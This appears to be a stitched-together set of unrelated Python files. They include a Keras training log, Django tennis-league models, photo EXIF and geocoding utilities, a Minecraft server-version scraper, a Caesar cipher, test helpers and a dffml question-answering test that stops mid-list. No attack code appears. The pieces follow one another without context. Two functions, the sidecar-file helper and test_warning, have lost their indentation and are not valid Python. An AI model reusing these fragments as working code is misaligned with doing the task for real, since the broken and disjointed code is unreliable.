new_image_array_with_new_added_dim.shape
# predict new image
model.predict(new_image_array_with_new_added_dim)
# argmax on predicted image -> class index
maxVoter=np.argmax(model.predict(new_image_array_with_new_added_dim), axis=1)
# bare comparison (notebook-style); evaluates whether class 2 was predicted
maxVoter==2
# true
'''
61/61 [==============================] - 24s 395ms/step - accuracy: 0.8324 - loss: 1.2957 - val_loss: 0.3694 - val_accuracy: 0.9444
Epoch 2/20
61/61 [==============================] - 20s 332ms/step - accuracy: 0.9313 - loss: 0.4453 - val_loss: 0.3510 - val_accuracy: 0.8889
Epoch 3/20
61/61 [==============================] - 21s 340ms/step - accuracy: 0.9441 - loss: 0.3790 - val_loss: 0.6043 - val_accuracy: 0.9444
Epoch 4/20
61/61 [==============================] - 20s 321ms/step - accuracy: 0.9462 - loss: 0.4484 - val_loss: 0.2590 - val_accuracy: 0.9444
Epoch 5/20
61/61 [==============================] - 20s 323ms/step - accuracy: 0.9600 - loss: 0.3198 - val_loss: 0.1842 - val_accuracy: 0.9444
Epoch 6/20
61/61 [==============================] - 20s 325ms/step - accuracy: 0.9549 - loss: 0.3837 - val_loss: 1.3335 - val_accuracy: 0.9444
Epoch 7/20
61/61 [==============================] - 20s 321ms/step - accuracy: 0.9544 - loss: 0.3626 - val_loss: 0.8762 - val_accuracy: 0.9444
Epoch 8/20
61/61 [==============================] - 20s 323ms/step - accuracy: 0.9600 - loss: 0.3469 - val_loss: 0.2045 - val_accuracy: 0.9444
Epoch 9/20
61/61 [==============================] - 20s 336ms/step - accuracy: 0.9672 - loss: 0.2943 - val_loss: 5.9072e-06 - val_accuracy: 1.0000
Epoch 10/20
61/61 [==============================] - 20s 334ms/step - accuracy: 0.9723 - loss: 0.2769 - val_loss: 4.0530e-06 - val_accuracy: 1.0000
Epoch 11/20
61/61 [==============================] - 21s 339ms/step - accuracy: 0.9713 - loss: 0.2478 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 12/20
61/61 [==============================] - 21s 344ms/step - accuracy: 0.9851 - loss: 0.1030 - val_loss: 6.6227e-09 - val_accuracy: 1.0000
Epoch 13/20
61/61 [==============================] - 20s 335ms/step - accuracy: 0.9841 - loss: 0.1818 - val_loss: 0.0014 - val_accuracy: 1.0000
Epoch 14/20
61/61 [==============================] - 21s 342ms/step - accuracy: 0.9851 - loss: 0.1116 - val_loss: 3.1127e-07 - val_accuracy: 1.0000
Epoch 15/20
61/61 [==============================] - 21s 346ms/step - accuracy: 0.9836 - loss: 0.2131 - val_loss: 0.1223 - val_accuracy: 0.9444
Epoch 16/20
61/61 [==============================] - 21s 338ms/step - accuracy: 0.9862 - loss: 0.1407 - val_loss: 1.1855e-06 - val_accuracy: 1.0000
Epoch 17/20
61/61 [==============================] - 21s 345ms/step - accuracy: 0.9790 - loss: 0.1318 - val_loss: 1.3245e-08 - val_accuracy: 1.0000
Epoch 18/20
61/61 [==============================] - 21s 345ms/step - accuracy: 0.9795 - loss: 0.1567 - val_loss: 8.4108e-07 - val_accuracy: 1.0000
Epoch 19/20
61/61 [==============================] - 21s 343ms/step - accuracy: 0.9831 - loss: 0.1475 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 20/20
61/61 [==============================] - 21s 352ms/step - accuracy: 0.9810 - loss: 0.2066 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
inceptionv3 gave accuracy 0.94.
'''
'''
Errors encountered:
1. ImportError: Could not import PIL.Image. The use of `load_img` requires PIL.
solution: pip install --upgrade keras numpy pandas sklearn pillow (https://github.com/asataniAIR/Image_DL_Tutorial/issues/4)
2. Internal: Invoking GPU asm compilation is supported on Cuda non-Windows platforms onlyRelying on driver to perform ptx compilation. Modify $PATH to customize ptxas location.
ref: https://github.com/tensorflow/models/issues/7640
3. could not synchronize on CUDA context: CUDA_ERROR_ILLEGAL_ADDRESS: an illegal memory access was encountered :: 0x00007FFE2B93BA05 tensorflow::CurrentStackTrace. GPU sync failed
solution: restart the program. (https://stackoverflow.com/questions/51112126/gpu-sync-failed-while-using-tensorflow)
''' |
import asyncio
import inspect
async def main():
    # Empty coroutine used only to inspect asyncio machinery below.
    pass
# `main` itself is a plain function; calling it produces a coroutine object.
print(type(main))
print(inspect.iscoroutinefunction(main))
# NOTE: the coroutines created below are never awaited, so Python emits a
# "coroutine was never awaited" RuntimeWarning — intentional for this demo.
print(type(main()))
print(dir(main()))
|
from typing import Iterable
from django.db import models
from django.contrib.auth.models import User
class Player(models.Model):
    # League member; identity and auth live on the linked Django User.
    address = models.CharField(max_length=200)
    city = models.CharField(max_length=200)
    state = models.CharField(max_length=2)
    zipcode = models.CharField(max_length=10)
    home_phone = models.CharField(max_length=20, blank=True)
    work_phone = models.CharField(max_length=20, blank=True)
    cell_phone = models.CharField(max_length=20, blank=True)
    # True when the player wants paper mailings instead of/in addition to email.
    # NOTE(review): inferred from the field name — confirm against usage.
    paper_mail = models.BooleanField()
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    def name(self):
        # "First Last" taken from the linked User record.
        return str(self.user.first_name + ' ' + self.user.last_name)
    def __str__(self):
        return self.name()
class Season(models.Model):
    """One player's participation in a given year."""
    year = models.IntegerField()
    player = models.ForeignKey(Player, on_delete=models.CASCADE)

    def doubles(self):
        """Return all doubles sign-ups for this season (as playerA or playerB).

        BUGFIX: the original added the two related managers directly (a
        TypeError at runtime) and had no return statement; evaluate both
        querysets and return the combined list.
        """
        return list(self.doublesA.all()) + list(self.doublesB.all())

    def __str__(self):
        return f'{self.player}({self.year})'
class Divisions(models.IntegerChoices):
    """Skill divisions, ordered strongest (1) to weakest (6)."""
    HIGH_ADVANCED = 1
    ADVANCED = 2
    HIGH_INTERMEDIATE = 3
    INTERMEDIATE = 4
    LOW_INTERMEDIATE = 5
    BEGINNER = 6

    @classmethod
    def get_name(cls, index) -> str:
        """Return the display label for *index*, or '' when not found."""
        labels = [label for value, label in cls.choices if value == index]
        return labels[0] if labels else ''
class Singles(models.Model):
    # A singles entry: one Season (player+year) competing in a division.
    player = models.ForeignKey(Season, on_delete=models.CASCADE)
    division = models.IntegerField(choices=Divisions.choices)
    def player_name(self):
        # Underlying Player via the Season link.
        return self.player.player
    def year(self):
        return self.player.year
    def __str__(self):
        return f'{self.player} - {Divisions.get_name(self.division)}'
class Doubles(models.Model):
    # A doubles pairing of two Seasons competing in a division.
    playerA = models.ForeignKey(Season, on_delete=models.CASCADE, related_name='doublesA')
    playerB = models.ForeignKey(Season, on_delete=models.CASCADE, related_name='doublesB')
    division = models.IntegerField(choices=Divisions.choices)
    def player_name(self):
        return f'{self.playerA.player}/{self.playerB.player}'
    def year(self):
        # Both seasons are assumed to share the year; playerA's is used.
        return self.playerA.year
    def __str__(self):
        return f'{self.playerA.player}/{self.playerB.player}({self.playerA.year}) - {Divisions.get_name(self.division)}'
class GenericMatch(models.Model):
    # Abstract base for matches; records a forfeit winner when applicable.
    HOME = "H"
    AWAY = "A"
    VICTOR = [
        (HOME, 'Home'),
        (AWAY, 'Away'),
    ]
    # Null when the match was actually played (no forfeit).
    forfeitWin = models.CharField(
        max_length=1,
        choices=VICTOR,
        null=True
    )
    class Meta:
        abstract = True
    def sets(self) -> Iterable['MatchSet']:
        # Overridden by concrete subclasses to return their set records.
        return []
class SinglesMatch(GenericMatch):
    # A match between two singles entries.
    home = models.ForeignKey(Singles, on_delete=models.CASCADE, related_name='home_matches')
    away = models.ForeignKey(Singles, on_delete=models.CASCADE, related_name='away_matches')
    def __str__(self):
        return f'{self.home.player} v {self.away.player}'
    def sets(self):
        # Reverse relation from SingleSet.match (default related name).
        return self.singleset_set.all()
class DoublesMatch(GenericMatch):
    # A match between two doubles pairings.
    home = models.ForeignKey(Doubles, on_delete=models.CASCADE, related_name='home_matches')
    away = models.ForeignKey(Doubles, on_delete=models.CASCADE, related_name='away_matches')
    def __str__(self):
        return f'{self.home.playerA.player}/{self.home.playerB.player} v {self.away.playerA.player}/{self.away.playerB.player}'
    def sets(self):
        # Reverse relation from DoubleSet.match (default related name).
        return self.doubleset_set.all()
class MatchSet(models.Model):
    """Abstract base for one set of a match: game scores plus optional tie-break scores."""
    # Games won; null until the set has been played/recorded.
    home = models.IntegerField(null=True)
    away = models.IntegerField(null=True)
    # Tie-break points; null when the set had no tie-break.
    tie_break_home = models.IntegerField(null=True)
    tie_break_away = models.IntegerField(null=True)
    # 1-based position of this set within the match.
    set_number = models.IntegerField()

    class Meta:
        abstract = True
class SingleSet(MatchSet):
    """A set belonging to a SinglesMatch."""
    match = models.ForeignKey(SinglesMatch, on_delete=models.CASCADE)
class DoubleSet(MatchSet):
    """A set belonging to a DoublesMatch."""
    match = models.ForeignKey(DoublesMatch, on_delete=models.CASCADE)
class ScoreKeepers(models.Model):
    """Assignment of a player to keep score for a division/match-type in a given year."""
    SINGLES = 'S'
    DOUBLES = 'D'
    # Choices for match_type.
    MATCH_TYPE = [
        (SINGLES, 'Singles'),
        (DOUBLES, 'Doubles'),
    ]
    year = models.IntegerField()
    division = models.IntegerField(choices=Divisions.choices)
    match_type = models.CharField(
        max_length=1,
        choices=MATCH_TYPE
    )
    # RESTRICT: a player with score-keeping duties cannot be deleted.
    player = models.ForeignKey(Player, on_delete=models.RESTRICT)

    def __str__(self):
        return f'{self.get_division_display()} {self.get_match_type_display()} {self.player}'
|
import logging
import logging.handlers
import os
import os.path
import exiftool
import numpy as np
import requests
from scipy.spatial import distance
import ownphotos.settings
# Module-level logger with a size-rotated file handler under LOGS_ROOT.
logger = logging.getLogger("ownphotos")
# NOTE(review): "fomatter" is a typo, but it is a module-level name that other
# modules could import; renaming it is out of scope for a comment-only pass.
fomatter = logging.Formatter(
    "%(asctime)s : %(filename)s : %(funcName)s : %(lineno)s : %(levelname)s : %(message)s"
)
fileMaxByte = 256 * 1024 * 200  # 50 MB per file (256 KiB * 200), not 100MB as previously claimed
fileHandler = logging.handlers.RotatingFileHandler(
    os.path.join(ownphotos.settings.LOGS_ROOT, "ownphotos.log"),
    maxBytes=fileMaxByte,
    backupCount=10,
)
fileHandler.setFormatter(fomatter)
logger.addHandler(fileHandler)
logger.setLevel(logging.INFO)
def convert_to_degrees(values):
    """
    Convert EXIF GPS coordinates (degrees, minutes, seconds rationals) to a float in degrees.
    :param values: sequence of three rationals exposing .num / .den
    :type values: exifread.utils.Ratio triple
    :rtype: float
    """
    degrees, minutes, seconds = (float(v.num) / float(v.den) for v in values[:3])
    return degrees + minutes / 60.0 + seconds / 3600.0
# Day-number -> English day name. Keys 1..7 run Monday..Sunday, which matches
# datetime.isoweekday() — presumably the intended caller; verify at call sites.
weekdays = {
    1: "Monday",
    2: "Tuesday",
    3: "Wednesday",
    4: "Thursday",
    5: "Friday",
    6: "Saturday",
    7: "Sunday",
}
def compute_bic(kmeans, X):
    """
    Computes the BIC metric for a given clusters
    Parameters:
    -----------------------------------------
    kmeans: List of clustering object from scikit learn
    X : multidimension np array of data points
    Returns:
    -----------------------------------------
    BIC value
    """
    # assign centers and labels
    centers = [kmeans.cluster_centers_]
    labels = kmeans.labels_
    # number of clusters
    m = kmeans.n_clusters
    # size of the clusters (bincount assumes labels are 0..m-1)
    n = np.bincount(labels)
    # size of data set: N samples, d features
    N, d = X.shape
    # compute variance for all clusters beforehand: pooled within-cluster
    # variance, normalized by (N - m) degrees of freedom and by dimension d
    cl_var = (1.0 / (N - m) / d) * sum(
        [
            sum(
                distance.cdist(X[np.where(labels == i)], [centers[0][i]], "euclidean")
                ** 2
            )
            for i in range(m)
        ]
    )
    # penalty term: free parameters approximated as m * (d + 1)
    const_term = 0.5 * m * np.log(N) * (d + 1)
    # log-likelihood of the spherical-Gaussian mixture minus the penalty
    BIC = (
        np.sum(
            [
                n[i] * np.log(n[i])
                - n[i] * np.log(N)
                - ((n[i] * d) / 2) * np.log(2 * np.pi * cl_var)
                - ((n[i] - 1) * d / 2)
                for i in range(m)
            ]
        )
        - const_term
    )
    return BIC
def mapbox_reverse_geocode(lat, lon):
    """Reverse-geocode (lat, lon) through the Mapbox places API.

    Returns the Mapbox response JSON with an added "search_text" key
    (space-joined feature names), or {} when MAPBOX_API_KEY is unset or
    the request does not return HTTP 200.
    """
    mapbox_api_key = os.environ.get("MAPBOX_API_KEY", "")
    if mapbox_api_key == "":
        return {}
    # Mapbox expects longitude before latitude in the URL path.
    url = (
        "https://api.mapbox.com/geocoding/v5/mapbox.places/%f,%f.json?access_token=%s"
        % (lon, lat, mapbox_api_key)
    )
    resp = requests.get(url)
    if resp.status_code == 200:
        resp_json = resp.json()
        search_terms = []
        if "features" in resp_json:
            for feature in resp_json["features"]:
                search_terms.append(feature["text"])
        resp_json["search_text"] = " ".join(search_terms)
        logger.info("mapbox returned status 200.")
        return resp_json
    logger.warning("mapbox returned status {} response.".format(resp.status_code))
    return {}
def get_sidecar_files_in_priority_order(media_file):
    """
    Return candidate XMP sidecar paths for *media_file*, highest priority
    first: extension-replaced names before extension-appended ones, and
    lowercase ".xmp" before uppercase ".XMP".
    """
    stem = os.path.splitext(media_file)[0]
    candidates = []
    for base in (stem, media_file):
        candidates.append(base + ".xmp")
        candidates.append(base + ".XMP")
    return candidates
# Shared ExifTool process wrapper; started lazily by callers and reused.
exiftool_instance = exiftool.ExifTool()
def _get_existing_metadata_files_reversed(media_file, include_sidecar_files):
if include_sidecar_files:
files = [
file
for file in get_sidecar_files_in_priority_order(media_file)
if os.path.exists(file)
]
files.append(media_file)
return list(reversed(files))
return [media_file]
def get_metadata(media_file, tags, try_sidecar=True):
    """
    Get values for each metadata tag in *tags* from *media_file*.

    If *try_sidecar* is `True`, a value found in an XMP sidecar file stored
    alongside *media_file* takes precedence over the media file itself.

    If *exiftool_instance* is already running it is left running; otherwise
    it is started here and terminated before returning.

    Returns a list with the value of each tag in *tags*, or `None` for tags
    that were not found in any source.
    """
    et = exiftool_instance
    started_here = not et.running
    if started_here:
        et.start()
    # Lowest-priority source first, so higher-priority values overwrite.
    sources = _get_existing_metadata_files_reversed(media_file, try_sidecar)
    values = []
    try:
        for tag in tags:
            value = None
            for source in sources:
                retrieved = et.get_tag(tag, source)
                if retrieved is not None:
                    value = retrieved
            values.append(value)
    finally:
        if started_here:
            et.terminate()
    return values
def write_metadata(media_file, tags, use_sidecar=True):
    """
    Write *tags* (a mapping of tag name -> value) for *media_file*.

    When *use_sidecar* is true the highest-priority sidecar path is written;
    otherwise the media file itself is modified in place. The shared
    exiftool process is started and stopped here only if it was not already
    running.
    """
    et = exiftool_instance
    started_here = not et.running
    if started_here:
        et.start()
    file_path = (
        get_sidecar_files_in_priority_order(media_file)[0]
        if use_sidecar
        else media_file
    )
    try:
        logger.info(f"Writing {tags} to {file_path}")
        params = [os.fsencode(f"-{tag}={value}") for tag, value in tags.items()]
        params.append(b"-overwrite_original")
        params.append(os.fsencode(file_path))
        et.execute(*params)
    finally:
        if started_here:
            et.terminate()
|
import urllib.request, urllib.error, urllib.parse
from bs4 import BeautifulSoup
import string
import json
import requests
import calendar
def _getVanilla():
    """Fetch Mojang's version manifest and return releases newer than
    2014-03-25 followed by snapshots newer than 2019-03-25, each as
    {'id': ..., 'url': ...}."""
    url = "https://launchermeta.mojang.com/mc/game/version_manifest.json"
    manifest = json.loads(requests.get(url).text)
    versions = []
    # Two passes keep releases grouped before snapshots, as before.
    for wanted_type, cutoff in (('release', "2014-03-25"), ('snapshot', "2019-03-25")):
        for v in manifest['versions']:
            if v['type'] == wanted_type and v['releaseTime'] > cutoff:
                versions.append({'id': v['id'], 'url': v['url']})
    return versions
def _getCraftBukkit():
    """List CraftBukkit jars on mcmirror as {'id', 'url', 'date'} dicts,
    newest first, keeping only builds dated after 2019/08/01 (plus the
    'latest' jar, whose pseudo-date 'Latest' sorts above any yyyy/mm/dd)."""
    versions = []
    link = "https://mcmirror.io/api/list/craftbukkit"
    filenames = json.loads(requests.get(link).text)
    filenames.sort()
    for version in filenames:
        if version == 'craftbukkit-latest.jar':
            date = 'Latest'
            versionID = version
        else:
            parts = version.split('-')
            # parts[3] is a yyyymmdd stamp in the jar filename.
            date = f"{parts[3][:4]}/{parts[3][4:6]}/{parts[3][6:]}"
            versionID = parts[1]
        if date > "2019/08/01":
            versions.append({'id': versionID + f' ({date})',
                             'url': f'https://mcmirror.io/files/craftbukkit/{version}',
                             'date': date})
    return sorted(versions, key=lambda entry: entry['date'], reverse=True)
def _getPaper():
    """List Paper jars on yivesmirror as {'id', 'url'} dicts, newest first.

    Fix: the previous code used str.strip('.jar'), which strips any of the
    characters '.', 'j', 'a', 'r' from both ends and can corrupt version ids
    (e.g. ones ending in 'a' or 'r'); exact prefix/suffix removal is used
    instead.
    """
    versions = []
    link = "https://yivesmirror.com/api/list/paper"
    filenames = json.loads(requests.get(link).text)
    filenames.sort()
    for version in filenames:
        version_id = version
        if version_id.startswith('Paper-'):
            version_id = version_id[len('Paper-'):]
        if version_id.endswith('.jar'):
            version_id = version_id[:-len('.jar')]
        versions.append({'id': version_id,
                         'url': f'https://yivesmirror.com/files/paper/{version}'})
    return versions[::-1]
def _getSpigotExtra():
    """Scrape archived Spigot jars from the mcmirror archive directory listing.

    Fix: the previous code used str.strip('spigot-') / str.strip('.jar'),
    which strip character *sets* from both ends and can eat legitimate
    leading/trailing id characters; exact prefix/suffix removal is used
    instead.
    """
    versions = []
    link = "https://archive.mcmirror.io/Spigot/"
    # Slice off the HTML listing's header and footer rows.
    rows = requests.get(link).text.split('\n')[4:-3]
    for row in rows:
        if ('api' in row) or ('spigot-latest' in row):
            continue
        filename = row.split('"')[1]
        name = filename
        if name.startswith('spigot-'):
            name = name[len('spigot-'):]
        if name.endswith('.jar'):
            name = name[:-len('.jar')]
        versions.append({
            'id': name,
            'url': 'https://archive.mcmirror.io/Spigot/' + filename,
            'date': 'Archived'})
    return sorted(versions, key=lambda entry: entry['id'], reverse=True)
def _getSpigot():
    """List Spigot jars on mcmirror as {'id', 'url', 'date'} dicts, newest
    first, then append the archived builds from _getSpigotExtra()."""
    versions = []
    link = "https://mcmirror.io/api/list/spigot"
    filenames = json.loads(requests.get(link).text)
    filenames.sort()
    for version in filenames:
        if version == 'spigot-latest.jar':
            date = 'Latest'
            versionID = version
        else:
            parts = version.split('-')
            # parts[3] is a yyyymmdd stamp in the jar filename.
            date = f"{parts[3][:4]}/{parts[3][4:6]}/{parts[3][6:]}"
            versionID = parts[1]
        versions.append({'id': versionID + f' ({date})',
                         'url': f'https://mcmirror.io/files/spigot/{version}',
                         'date': date})
    versions = sorted(versions, key=lambda entry: entry['date'], reverse=True)
    versions.extend(_getSpigotExtra())
    return versions
def getVersions():
    """Collect version listings for every supported server flavour.

    Returns a dict keyed by flavour name; Forge is not implemented and is
    always an empty list.
    """
    return {
        'Vanilla': _getVanilla(),
        'CraftBukkit': _getCraftBukkit(),
        'Spigot': _getSpigot(),
        'PaperMC': _getPaper(),
        'Forge': [],
    }
# Lowercase ASCII letters as a list (helper table for callers of this module).
chars = list(string.ascii_lowercase)
# Month abbreviation -> month number ('' maps to 0, 'Jan' to 1, ... 'Dec' to 12).
monthabbr = {v: k for k,v in enumerate(calendar.month_abbr)}
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddlespeech.server.engine.engine_factory import EngineFactory
# global value
# Maps engine name (e.g. "asr") to its initialized engine instance.
ENGINE_POOL = {}
def get_engine_pool() -> dict:
    """Return the module-level pool mapping engine name to engine instance."""
    # Reading a module global needs no `global` declaration.
    return ENGINE_POOL
def init_engine_pool(config) -> bool:
    """Create and initialize one engine per entry of config.engine_list.

    Each entry has the form "<engine>_<type>" (e.g. "asr_python"); stops and
    returns False as soon as any engine fails to initialize, True otherwise.
    """
    global ENGINE_POOL
    for engine_and_type in config.engine_list:
        parts = engine_and_type.split("_")
        engine, engine_type = parts[0], parts[1]
        instance = EngineFactory.get_engine(
            engine_name=engine, engine_type=engine_type)
        ENGINE_POOL[engine] = instance
        if not instance.init(config=config[engine_and_type]):
            return False
    return True
|
class Caesar:
    """Caesar cipher over the full Unicode code-point range."""

    # Number of Unicode code points; shifts wrap modulo this value, so
    # crypt(crypt(s), decrypt=True) == s for any shift.
    _MODULUS = 1114111

    def __init__(self, shift):
        """:param shift: number of code points to shift by when encrypting."""
        self.shift = shift

    def crypt(self, inputString, decrypt=False):
        """Encrypt *inputString*, or decrypt it when *decrypt* is True.

        Each character's code point is shifted by +shift (or -shift for
        decryption) modulo the Unicode range.
        """
        offset = -self.shift if decrypt else self.shift
        return ''.join(chr((ord(c) + offset) % self._MODULUS) for c in inputString)
if __name__ == '__main__':
    # Interactive demo: encrypt a message, print it, then decrypt it again.
    # NOTE(review): "PLease" is a typo in user-facing text; left unchanged here.
    mg = str(input("PLease type the message : "))
    shifts = int(input("Choose number of shifts : "))
    encrypt = Caesar(shifts)
    answer = encrypt.crypt(mg)
    # Encoded to bytes so non-printable shifted characters display safely.
    print(answer.encode('utf8'))
    answer2 = encrypt.crypt(answer, True)
    print(answer2.encode('utf8'))
|
# warncheck.py
#
import warnings
import unittest
from sys import version_info
from dicom.test.version_dep import capture_warnings
def assertWarns(self, warn_msg, function, *func_args, **func_kwargs):
    """
    Check that the function generates the expected warning
    with the arguments given.
    warn_msg -- part of the warning string; the single emitted warning must contain it
    function -- the function to call (expected to issue a warning)
    func_args -- positional arguments to the function
    func_kwargs -- keyword arguments to the function
    Return the function return value.
    """
    result, all_warnings = capture_warnings(function, *func_args,
                                            **func_kwargs)
    # assertEqual / assertIn report the actual values on failure, unlike
    # assertTrue on a pre-computed boolean; pass/fail behavior is unchanged.
    msg = "Expected one warning; got {0:d}"
    self.assertEqual(len(all_warnings), 1, msg.format(len(all_warnings)))
    msg = "Expected warning message '{0:s}...'; got '{1:s}'"
    self.assertIn(warn_msg, all_warnings[0],
                  msg.format(warn_msg, all_warnings[0]))
    return result
def test_warning(the_warning):
if the_warning:
warnings.warn(the_warning)
class WarnTests(unittest.TestCase):
    """Self-test for the assertWarns helper defined above."""
    def testWarn(self):
        """Test that assertWarns works as expected"""
        assertWarns(self, "Look", test_warning, "Look out")
if __name__ == "__main__":
    # Run the self-tests when this module is executed directly.
    unittest.main()
|
import time
# This class is a singleton class.
# timer: calculates the time elapsed between any two calls.
# In this project it is used to calculate the fps of the video
# or camera, and the fps of captured face frames.
class timer():
    """Singleton stopwatch for measuring elapsed time between calls (e.g. FPS)."""

    __instance = None  # the single shared instance

    @staticmethod
    def timerInstance():
        """Return the singleton instance, creating it on first use."""
        # `is None` is the correct identity test (was `== None`).
        if timer.__instance is None:
            timer()
        return timer.__instance

    def __init__(self):
        """Initialize the singleton; raises if an instance already exists."""
        if timer.__instance is not None:
            raise Exception("Timer class is a singleton class")
        else:
            timer.__instance = self
        # All timestamps below are seconds since the epoch (time.time()).
        self.prev_time = 0
        self.last_time = 0
        self.next_time = 0
        self.frame_time = 0
        self.time_elapsed = 0
        self.start_time = 0
        self.last_time_in_time_elapsed = 0
        self.current_time = 0
        self.started = False
        self.time_at_reset = 0

    def start(self):
        """Start (or restart) the timer, zeroing the elapsed-time bookkeeping."""
        self.started = True
        self.time_elapsed = 0
        self.last_time = time.time()
        self.last_time_in_time_elapsed = self.last_time
        self.start_time = self.last_time
        self.current_time = self.last_time
        self.time_at_reset = self.start_time

    def timeElapsed(self):
        """Return seconds since the previous timeElapsed() (or start()) call."""
        self.current_time = time.time()
        self.time_elapsed = self.current_time - self.last_time_in_time_elapsed
        self.last_time_in_time_elapsed = self.current_time
        return self.time_elapsed

    def timeCounter(self):
        """Return seconds since the last timeCounterReset() (or start())."""
        return time.time() - self.time_at_reset

    def timeCounterReset(self):
        """Restart the counter read by timeCounter()."""
        self.time_at_reset = time.time()

    def timeSinceStart(self):
        """Return seconds since start() was called."""
        return time.time() - self.start_time
|
from google.appengine.ext import db
from catnado.properties.key_property import KeyProperty
class UniquePropertyRecordExistsError(Exception):
    """Raise when attempting to create a property that already exists."""
    # Raised by UniquePropertyRecord.create with the existing key name as message.
    pass
class UniquePropertyRecord(db.Model):
    """Datastore model for keeping particular properties unique.
    Creates a key name using a combination of the Kind, Property Name, and Value.
    Since get_by_key_name is strongly consistent within a datastore transactional,
    one can be certain that no other entity exists with that specific combination
    as long as a UniquePropertyRecord is created during the same transaction.

    NOTE: this module targets Python 2 / Google App Engine (see the
    `basestring` check below).
    """
    # Optional pointer back to the entity whose property this record guards.
    target_key = KeyProperty()

    @staticmethod
    def make_key_name(kind, property_name, value):
        """Make a Key Name given a kind, property name, and value.
        Args:
          kind: required str or db.Model subclass
          property_name: required str; property name i.e. "email"
          value: required value (that can be converted to a string)
        Returns:
          str to be used as a Key Name
        Raises:
          ValueError if kind is not a string or db.Model subclass
        """
        if isinstance(kind, type) and issubclass(kind, db.Model):
            kind = kind.kind()
        if not isinstance(kind, basestring):
            raise ValueError('kind must be a string or db.Model subclass')
        return '{}:{}:{}'.format(kind, property_name, value)

    @staticmethod
    def create(kind, property_name, value, target_key=None):
        """Create a UniquePropertyRecord.
        If called from within a transactional, there is no attempt to verify that
        the given combo of key/property_name/value doesn't already exist. It is
        assumed that one calling this function from within a transactional is already
        verifying that the combo is unique.
        Args:
          (see make_key_name)
          target_key: optional db.Model subclass or key pointing at any entity
        Returns:
          newly-created UniquePropertyRecord key or None
        Raises:
          UniquePropertyRecordExistsError: if the combination already exists
          ValueError: if kind is not a string or db.Model subclass
        """
        assert value is not None
        called_from_transaction = db.is_in_transaction()
        def _create():
            # Only pre-check for duplicates when we own the transaction;
            # otherwise the caller is responsible for uniqueness.
            if not called_from_transaction:
                existing_record = UniquePropertyRecord.retrieve(kind, property_name, value)
                if existing_record:
                    raise UniquePropertyRecordExistsError(existing_record.key().name())
            key_name = UniquePropertyRecord.make_key_name(kind, property_name, value)
            return UniquePropertyRecord(key_name=key_name, target_key=target_key).put()
        if not called_from_transaction:
            return db.run_in_transaction(_create)
        else:
            return _create()

    @staticmethod
    def retrieve(kind, property_name, value):
        """Find a UniquePropertyRecord, if it exists.
        Args:
          see create
        Returns:
          the existing UniquePropertyRecord entity, or None if none exists with
          the given kind, property name, and value
        """
        key_name = UniquePropertyRecord.make_key_name(kind, property_name, value)
        return UniquePropertyRecord.get_by_key_name(key_name)
|
import tempfile
from dffml.record import Record
from dffml.source.source import Sources
from dffml import train, accuracy, predict
from dffml.util.asynctestcase import AsyncTestCase
from dffml.source.memory import MemorySource, MemorySourceConfig
from dffml_model_transformers.qa.qa_model import QAModel, QAModelConfig
from .defaults import CACHE_DIR
class TestQAModel(AsyncTestCase):
    """Train/accuracy/predict round-trip test for the transformers QA model."""

    @classmethod
    def setUpClass(cls):
        """Build in-memory train/test sources from TRAIN_DATA / TEST_DATA and
        configure a bert-base-cased QA model in a temporary directory."""
        # Columns: title, context, question, answer_text, start_pos_char, is_impossible.
        (A_train, B_train, C_train, X_train, D_train, E_train,) = list(
            zip(*TRAIN_DATA)
        )
        A_test, B_test, C_test, X_test, D_test, E_test = list(zip(*TEST_DATA))
        cls.train_records = [
            Record(
                str(i),
                data={
                    "features": {
                        "title": A_train[i],
                        "context": B_train[i],
                        "question": C_train[i],
                        "answer_text": X_train[i],
                        "start_pos_char": D_train[i],
                        "is_impossible": E_train[i],
                        "answers": [],
                    }
                },
            )
            for i in range(len(X_train))
        ]
        cls.test_records = [
            Record(
                str(i),
                data={
                    "features": {
                        "title": A_test[i],
                        "context": B_test[i],
                        "question": C_test[i],
                        "answer_text": X_test[i],
                        "start_pos_char": D_test[i],
                        "is_impossible": E_test[i],
                        "answers": [],
                    }
                },
            )
            for i in range(len(X_test))
        ]
        cls.train_sources = Sources(
            MemorySource(MemorySourceConfig(records=cls.train_records))
        )
        cls.test_sources = Sources(
            MemorySource(MemorySourceConfig(records=cls.test_records))
        )
        cls.model_dir = tempfile.TemporaryDirectory()
        cls.model = QAModel(
            QAModelConfig(
                model_name_or_path="bert-base-cased",
                cache_dir=CACHE_DIR,
                directory=cls.model_dir.name,
                log_dir=cls.model_dir.name,
                model_type="bert",
                no_cuda=True,
            )
        )

    @classmethod
    def tearDownClass(cls):
        """Remove the temporary model directory."""
        cls.model_dir.cleanup()

    async def test_00_train(self):
        """Model trains without raising."""
        await train(self.model, self.train_sources)

    async def test_01_accuracy(self):
        """Accuracy on the training data is a non-negative number."""
        res = await accuracy(self.model, self.train_sources)
        self.assertGreaterEqual(res, 0)

    async def test_02_predict(self):
        """Predictions produce string answers for the test records."""
        predictions = [
            prediction
            async for prediction in predict(self.model, self.test_sources)
        ]
        self.assertIn(
            isinstance(predictions[0][2]["Answer"]["value"]["0"], str), [True]
        )
        self.assertIn(
            isinstance(predictions[1][2]["Answer"]["value"]["1"], str), [True]
        )
# Randomly generate sample data
title = "World War 2"
context = "Second world war lasted from 1939 to 1945. The first belligerent act of war was Germany's attack on Poland. The first two countries to declare war on Germany were Britain and France."
# train_ques_ans_list = [[question, answer_text, start_pos_char, is_impossible]]
train_ques_ans_list = [
    [
        "How long was the second world war?",
        "lasted from 1939 to 1945",
        18,
        False,
    ],
    [
        "Which were the first two countries to declare war on Germany?",
        "Britain and France",
        164,
        False,
    ],
    [
        "What was the first act of war?",
        "Germany's attack on Poland",
        81,
        False,
    ],
]
# Test questions carry placeholder answers (" ", offset 0) — the model fills them in.
test_ques_ans_list = [
    ["How long was the second world war?", " ", 0, False,],
    [
        "Which were the first two countries to declare war on Germany?",
        " ",
